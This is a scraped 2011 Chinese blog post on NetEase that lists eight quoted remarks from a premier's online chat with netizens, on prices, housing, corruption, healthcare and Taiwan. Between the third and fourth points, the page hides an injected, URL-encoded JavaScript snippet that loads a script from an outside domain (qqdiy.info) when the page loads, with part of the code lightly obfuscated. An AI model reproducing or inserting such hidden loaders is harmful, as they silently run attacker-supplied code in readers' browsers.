注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

dawei19500904的博客

几分怀旧,几分闲趣,几分思想。

 
 
 

日志

 
 

2011年02月27日总理和网友在线交流8要点  

2011-02-28 22:36:21|  分类: 论政 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

1)  如果我没有信心,不去努力,那就是失职,就是对人民的不负责。我不仅要做这样的表态,而且要付出实际行动。

2)  我每天都要看物价指标,请大家相信,一个每天关注物价、了解行情的人,是不会允许物价上涨而得不到遏制的。

3)  我没有调查每一个房地产商的利润,但是我认为你们应该对社会尽到责任。你们的身上也应该流着道德的血液。

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<4)  我要说一点国情,那就是我们国家是一个人口众多、土地稀缺的国家,住有所居并不意味着每人都有自己的住房。

5)  无论什么人,有多高的职务,只要他们违法乱纪、贪污受贿,都会受到严厉惩处。在这个问题上绝不能手软。

6)  基本解决群众看病难的问题,这点我们一定能够做到。我们绝不让社会上有一个人因为疾病而得不到治疗。

7)  对于幸福的理解和标准可能人们都有不同,我只是说如何让人们生活得舒心、安心、放心,对未来有信心。

8)  终有一天我们会实现一个更高的愿望,就是让一个完整的、统一的中国的河山得以实现,让两岸永远合璧在一起。

  评论这张
 
阅读(86)| 评论(2)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017